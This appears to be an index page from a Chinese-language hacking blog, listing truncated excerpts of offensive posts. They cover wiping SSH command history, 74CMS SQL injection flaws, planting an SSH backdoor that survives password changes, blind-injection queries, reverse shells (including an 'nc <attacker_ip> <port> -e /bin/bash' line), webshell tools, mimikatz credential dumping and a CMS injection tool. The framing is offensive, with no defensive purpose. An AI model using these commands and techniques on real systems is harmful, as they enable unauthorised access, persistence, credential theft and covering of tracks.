1. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/...
74CMS Sql注入漏洞一枚2
74CMS Sql注入漏洞 一枚2 漏洞 作者: ′ 雨。 在plus/ajax_user.php中
教你ssh后门安装
首先需要root权限,取得root权限后放一个ssh后门,这样就算管理员改了root密码,你也可以通过这个sshbackdoor登入。。。 1、mv /etc/ssh/ssh_config /etc/...
C#常用字符串加密解密方法封装代码
//方法一 //须添加对System.Web的引用 //using System.Web.Security; /// <summary> /// SHA1加密字符串 /// </su...
74CMS Sql 注入漏洞一枚1
漏洞 作者: ′ 雨。 在user/user_pms.php中 elseif($act=="add_save") { $setsqlarr['msgtype']=2; $setsq...
mysql搜索型注入盲注语句备份
先来说一点基础的东西。 php中和mysql 的一点基本的知识。大鸟飞过了 left() 从左向右截取 length()函数是计算括号中数据的长度,回显为纯数字,可以用大于小于和等...
linux下反弹Shell的五种方法
1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;...
开源网站管理工具——Altman
Altman,the webshell tool,自己写的一款开源软件。 0×00前言 之前用过几款webshell 工具,有B/C的也有C/S的,有的只能用于php或者aspx,...
神器mimikatz2.0发布
mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新 功能还包括能够通...
一个奇怪的ASP一句话
一句话代码: <script language="javascript" runat="server"> </script> 利用语句(参数a=):
CS渗透之绕过登陆
CS绕过登陆 最近博客少了更新,今天抽空写一篇吧。 大多数我们渗透 都是针对b/s模型 很少是针对c/s模型。
云购cms注入漏洞利用工具
继续来福利了。之前写好的,一直放在内部群。 如今0day 早已有人放出。工具也放出来吧。 最近陆续发0day 发工具。
1156